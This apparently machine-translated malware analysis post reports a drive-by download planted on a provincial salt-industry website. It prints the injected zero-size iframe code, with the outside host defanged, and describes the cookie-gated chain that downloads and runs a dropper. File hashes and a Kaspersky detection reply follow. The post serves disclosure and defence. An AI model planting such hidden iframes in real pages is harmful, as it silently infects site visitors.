The Code of Trojan. DL. win32.agent. ZrC was implanted in a provincial Salt Industry Network.

The Code of Trojan. DL. win32.agent. ZrC was implanted in a provincial Salt Industry Network.

EndurerOriginal
1Version

Code is added to the header and tail of the homepage of the website:
/---
<IFRAME src = hxxp: // H * ot ** peak. Host **. 2 * w ** cn.com/wm/index.htm width = 0 Height = 0> </iframe>
---/

Hxxp: // H * ot ** peak. Host **. 2 * w ** cn.com/wm/index.htmCheck the cookie variable heiyeno2. If it does not exist, create the cookie and output the Code:
/---
<IFRAME width = 0 Height = 0 src?tcsafe.htm> </iframe>
<IFRAME src = hxxp: // H * ot ** peak. Host **. 2 * w ** cn.com/wm/tcsafe.htm width = 0 Height = 0> </iframe>
---/

Tcsafe.htmDownload xxz.exe, save it as tcsafe.com, and run it.

File Description: D:/test/xxz.exe
Attribute: ---
Language: Chinese (China)
File version: 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
Description: Win32 cabinet self-Extractor
Copyright: (c) Microsoft Corporation. All rights reserved.
Note:
Product Version: 6.00.2900.2180
Product Name: Microsoft (r) Windows (r) Operating System
Company Name: Microsoft Corporation
Legal trademark:
Internal name: wextract
Source File Name: wextract. exe
Creation Time: 12:17:32
Modification time: 12:17:36
Access time: 12:22:53
Size: 386560 bytes, 377.512 KB
MD5: 452ec2b7ec2f9823a42474e90c55319d
Sha1: 87aba7445fed3cd5ce2a4df7cc705902a50b3a8a
CRC32: 07ca93ce

Rising news:Trojan. DL. win32.agent. ZrC> Aspr. ske.2.x. New> 3.exe>> pe_patch (14)> pe_patch (14)

 

Subject:	Re: xxz.exe [KLAB-3175811]
Sender:	"" <Newvirus@kaspersky.com>	Sent at: 13:31:08

Hello.
Trojan-Dropper.Win32.Agent.ceb
New malicious software was found in the attached file.
It's detection will be removed in the next update. Thank you for your help.
-----------------
Regards, Yury nesmachny
Virus analyst, Kaspersky Lab.